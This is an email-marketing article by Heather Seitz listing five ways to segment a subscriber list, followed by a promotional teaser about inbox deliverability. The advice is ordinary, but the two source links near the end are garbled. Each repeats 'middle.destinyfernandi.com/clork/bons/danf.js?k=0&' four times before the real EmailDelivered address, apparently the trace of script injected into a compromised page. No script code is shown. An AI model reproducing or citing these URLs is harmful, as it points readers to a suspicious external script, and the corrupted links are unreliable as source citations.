5 Ways to Segment Your List
It is important to send the right messages to the right people on your list. While it may take a little more effort on your part, it's going to pay off in the long run with better deliverability, higher engagement rates, and happier subscribers.
Here are 5 options for segmenting and targeting:
- Subscriber Profile. These are general demographic data points that you can segment on such as age, gender, geo-location, etc.
- Customer Value. There are services that can help you profile your ideal customer based on the highest value customers in your existing database. Then, you can segment similar subscribers separately and market to them differently from your lower value subscribers.
- Subscriber Response. Segment based on the types of messages subscribers are interacting with. In other words, subscribers that are opening 75% of your emails on a particular topic indicate that's a hot topic with that segment, which could prove highly profitable.
- Multi-Channel Segmentation. In other words, consider other methods of targeting for some of your subscribers, such as direct mail, social media, etc. For example, Facebook targeting might be a good way to get back some of your subscribers that have become unengaged or disinterested. By using different media with different hooks, you'll be able to recapture and reinitiate the relationship.
- Personas or Avatars. Start by segmenting your list by high revenue customers, low revenue customers, openers/clickers, and non engaged. Each of these segments warrants different types of marketing for optimal results. The goal is to move each to the next level.
For instance, the non-engaged people simply need to show some basic interest by opening an email. People that open and click, but never purchase, need to move through the cycle and purchase their first product. Single order customers should be encouraged to buy more... And repeat buyers should be rewarded with perks, are your best referral sources, etc.
For over a decade Heather Seitz used email marketing to build successful companies and had to solve the biggest barrier to consistent profitability: deliverability. Today she is the Co-Founder and CEO of Email Delivered.
This information has been provided by http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&www.EmailDelivered.com and written by Heather Seitz. To learn more about the 5 ways to segment your list, and other helpful email marketing and deliverability tips, visit: http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&www.emaildelivered.com/5-ways-to-segment-your-list/. Don’t forget to sign up for the EmailDelivered Pulse newsletter for articles, tips, and recommended resources related to email marketing and email deliverability.
How to Get Your Emails to the Inbox
If you want to get more of your emails to the inbox, you need to know the secrets that the Email Service Providers AREN’T willing to tell you. For a limited time, I’m sharing some select tips that top Internet Marketers know... for FREE.
Here’s what you’ll get right now...
- The How to Guide for getting your emails back to the inbox.
- How to find (and improve) your email “reputation” (how the ISPs see you).
- 5 Email KILLERS that your email service provider is purposely hiding from you.